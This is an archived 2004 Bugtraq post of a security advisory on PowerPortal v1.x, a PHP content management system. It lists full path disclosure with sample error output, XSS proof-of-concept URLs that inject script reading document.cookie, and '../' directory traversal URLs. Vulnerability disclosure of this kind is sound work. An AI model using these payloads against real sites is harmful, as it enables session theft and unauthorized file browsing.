Multiple vulnerabilities PowerPortal

• Previous message: c0ntex_at_open-security.org: "MPlayer MeMPlayer.c"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: bugtraq@securityfocus.com
Date: Sun, 27 Jun 2004 17:41:21 -0700

http://www.swp-zone.org/archivos/advisory-07.txt

-------------------------------------------------------------------------------------------------

                            :.: Multiple vulnerabilities PowerPortal :.:

  PROGRAM: PowerPortal
  HOMEPAGE: http://powerportal.sourceforge.net/
  VERSION: v1.x
  BUG: Multiple vulnerabilities
  DATE: 23/05/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbicho@peru.com

-------------------------------------------------------------------------------------------------

1.- Affected software description:
    ------------------------------

    PowerPortal is a popular content management system, written in php

2.- Vulnerabilities:
    ---------------

 A. Full path disclosure:

    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive
    information.
    
    :.: Examples:

    * http://attacker/modules/gallery/resize.php

    <br />
    <b>Warning</b>: imagecreatetruecolor(): Invalid image dimensions in
    <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
    <b>18</b><br />
    <br />
    <b>Warning</b>: imagecopyresized(): supplied argument is not a
    valid Image resource in
    <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
    <b>20</b><br />
    <br />
    <b>Warning</b>: imagejpeg(): supplied argument is not a valid Image
    resource in
    <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
    <b>23</b><br />

    * http://attacker/power/modules.php?name=gallery&files=darkbicho

    Warning:
    opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho):
    failed to open dir: Invalid argument in
    c:\appserv\www\power\modules\gallery\index.php on
    line 99

 B. Cross-Site Scripting aka XSS:

http://attacker/modules.php?name=private_messages&file=reply&id='><script>alert(document.cookie);</script>
http://attacker/modules.php?name=links&search=>alert(document.cookie);</script>&func=search_results
http://attacker/modules.php?name=content&file=search&search=>alert(document.cookie);</script>&func=results
http://attacker/modules.php?name=gallery&files=>alert(document.cookie);</script>

  C. Arbitrary directory browsing:

    * http://attacker/modules.php?name=gallery&files=/../../../

3.- SOLUTION:
     จจจจจจจจ
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon.
    Check the PowerPortal website for updates and official release
    details.

4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "EL PISCO ES Y SERA PERUANO"

5.- Contact
    -------

        WEB: http://www.darkbicho.tk
        EMAIL: darkbicho@peru.com

-------------------------------------------------------------------------------------------------
                                ___________ ____________
                               / _____/ \ / \______ \
                               \_____ \\ \/\/ /| ___/
                              / \\ / | |
                             /_______ / \__/\ / |____|
                             \/ \/
                       
                                Security Wari Projects
                                  (c) 2002 - 2004
                                    Made in Peru

----------------------------------------[ EOF
]----------------------------------------------
 
  
  
DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------

• Previous message: c0ntex_at_open-security.org: "MPlayer MeMPlayer.c"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]